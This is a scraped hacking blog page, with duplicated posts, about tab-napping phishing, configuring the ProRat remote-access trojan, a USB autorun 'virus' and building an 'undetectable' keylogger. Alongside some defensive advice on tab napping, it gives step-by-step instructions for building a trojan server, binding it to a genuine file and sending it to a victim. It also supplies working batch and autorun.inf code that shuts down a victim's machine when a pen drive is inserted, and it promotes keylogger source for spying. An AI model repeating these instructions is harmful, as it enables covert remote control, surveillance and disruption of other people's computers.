Tab Napping is a new form of phishing that is hitting the internet now. With the conventional form of phishing, for example, you might receive an email that is supposedly from your bank, and it might ask you to login and update or confirm your account details, of course, there would be a link to your banks website in the email for you to click, which would take you to a page that looks identical to your real banks login page.
How does it worksTab napping is more sophisticated than the phishing scams we’ve seen so far, and it no longer relies on persuading you to click on a dodgy link. Instead it targets internet users who open lots of tabs on their browser at the same time (for example, by pressingCTRL + T). if you have multiple tabs open and you are reading the page on your current active tab, any of the other inactive browser tabs could be replaced with a fake web page that is set up to obtain your personal data, the web page will look exactly the same as the page you opened in the tab, you probably wont even even know it has been replaced with a fake page.fraudsters can actually detect when a tab has been left inactive for a while, and spy on your browser history to find out which websites you regularly visit, and therefore which pages to fake.This may surprise you, but phishers and fraudsters in general can actually detect when a tab has been left inactive for a period of time, which means they can spy on your browsing history, this tells them which websites and web pages you visit on a regularly basis, so they'll know which bank you use and which email account you use, whatever you view, they'll know about it, which means they'll know which fake pages to make to replace the real pages in your inactive tabs, you've now left yourself open to become a victim of tab napping. How can you protect yourself against tab napping? Here are five simple ways you can prevent yourself from falling victim: • Make sure you always check the URL in the browser address page is correct before you enter any login details. A fake tabbed page will have a different URL to the website you think you’re using.• Always check the URL has a secure https:// address even if you don’t have tabs open on the browser.• If the URL looks suspicious in any way, close the tab and reopen it by entering the correct URL again.• Avoid leaving tabs open which require you to type in secure login details. Don't open any tabs while doing online banking - open new windows instead (CTRL + N). Download Tabnapping Script from Azkan website: Note: Source link may be malicious, open as your own risk.. |
this blog is providing information and tutorial about ethical hacking. cybersecurity, cybercrime awareness. cybercrime investigation, cybercrime detection, information security.!
Tuesday, August 25, 2015
Tab Napping
PRORAT HOW TO USE AND CONFIGURE FULL GUIDE
Requirements :
1. Prorat- Click here to download Trojan Prorat.
2. Hostname - Your IP address would probably be dynamic that it keeps changing everytime you disconnect and reconnect. You need a host name which always automatically keep pointing to your changing IP. Follow these steps -:
1. Log On to www.no-ip.com and register for an account.
2. Go to Hosts/Redirects -> Add Host and choose any free available hostname. Do not change any other option and simply click on Create Host.
3. Downloading and install their DNS update client available here http://www.no-ip.com/downloads.php Run it and enter your credentials. Update your host name and save it.
4. Lets check whether your IP has been associate with chosen host name or not. Go to command prompt and type 'ping yourhostname' (without quotes) , hopefully it should reply with your IP address.
Tutorial for configuring Trojan :
1. Open prorat.exe that you have downloaded.
2. Click on Create and then Create ProRat Server
3. Enter your host name in the ProRat Notification field as shown. Uncheck all other options.
4. Click on general settings Tab and have a look at server port,password, victim name. Remember these things.Check out and configure other options as per your need. You can bind server.exe with any genuine file, change its icon etc.
5. Finally click on create server and now its ready to be sent to victim. Once victim installs it, it would automatically disable antivirus/firewall
What after victim has run the server part ?
1.Click on ProConnective Tab and start listening to connections. Allow firewall if it asks you to open a port.
2.You will start listening to connections, I mean you will get a notification as shown when victim would be online.
This is for Education Purpose Only ..
Leave Thanks in comments if you like the post
PRORAT HOW TO USE AND CONFIGURE FULL GUIDE
Requirements :
1. Prorat- Click here to download Trojan Prorat.
2. Hostname - Your IP address would probably be dynamic that it keeps changing everytime you disconnect and reconnect. You need a host name which always automatically keep pointing to your changing IP. Follow these steps -:
1. Log On to www.no-ip.com and register for an account.
2. Go to Hosts/Redirects -> Add Host and choose any free available hostname. Do not change any other option and simply click on Create Host.
3. Downloading and install their DNS update client available here http://www.no-ip.com/downloads.php Run it and enter your credentials. Update your host name and save it.
4. Lets check whether your IP has been associate with chosen host name or not. Go to command prompt and type 'ping yourhostname' (without quotes) , hopefully it should reply with your IP address.
Tutorial for configuring Trojan :
1. Open prorat.exe that you have downloaded.
2. Click on Create and then Create ProRat Server
3. Enter your host name in the ProRat Notification field as shown. Uncheck all other options.
4. Click on general settings Tab and have a look at server port,password, victim name. Remember these things.Check out and configure other options as per your need. You can bind server.exe with any genuine file, change its icon etc.
5. Finally click on create server and now its ready to be sent to victim. Once victim installs it, it would automatically disable antivirus/firewall
What after victim has run the server part ?
1.Click on ProConnective Tab and start listening to connections. Allow firewall if it asks you to open a port.
2.You will start listening to connections, I mean you will get a notification as shown when victim would be online.
This is for Education Purpose Only ..
Leave Thanks in comments if you like the post
Hack Friends ComPuter Using Pendrive trick
- Hello Friends,
- In this post i will help you to make the virus to make the system turned off whenever pen drive is inserted. Try It to College, institute….and Fun With Friends.
Step 1:>>copy this code into notepad:
@echo off shutdown -s -t 00
Save as abc.bat extension (for eg: trixhub.bat).
Step 2: Now open the notepad and copy bellow code and paste in notpad.
Step 2: Now open the notepad and copy bellow code and paste in notpad.
[autorun] Open=besthacking.bat Action=Mouse Disable
Now Save it as “autorun.inf”
Step 3: Then copy the two files in your pen drive or victim’s pen drive.
Step 3: Then copy the two files in your pen drive or victim’s pen drive.
That’s all whenever the victim insert his pen drive,the system will be turned off automatically.
How to Disable This Hack
First Stop Autorun in Your Computer And Then Format Pendrive..
And If You don’t know how to Stop Autorun Check Post How to Disable Autorun in Windows
MAKE YOUR OWN KEYLOGGER.
AIRBORNE TEXT
WHAT IS KEYLOGGER?
A KeyLogger is a computer device or a program that records the real time activity of a computer user including the keyboard keys they press.You can not detect the presence of KeyLogger on your computer since it runs in background(Stealth mode) and also it is not listed in task manager or control panel or privacy purpose. It can be used by parents to keep eye on their children, company owners to spy on their employees or by hackers to steal account and information from the victim's computer.
Make your own undetectable KeyLogger within 10 minutes.Yes,all you need is visual studio and the source code of the KeyLogger which you can download from the link given below.
STEPS FOR MAKING YOUR OWN KEYLOGGER :
- Download and install visual studio from here.
- Download the source code from here or from the download button given below.
- Watch the video tutorial given below about how to make your own KeyLogger within 10 minutes
Video URL By NERD http://www.youtube.com/watch?v=YI146SJsU6k.
Subscribe to:
Posts (Atom)
Evil Twin attack
Evil Twin Attack is attack is frequently carried upon wireless access points with malicious intentions. This attack happens when...
-
A typical organization is divided into operational, middle, and upper level. The information requirements for users at each level differ. ...
-
To browse .onion Deep Web links, install Tor Browser from http://torproject.org/ Hidden Service lists and search engines http:...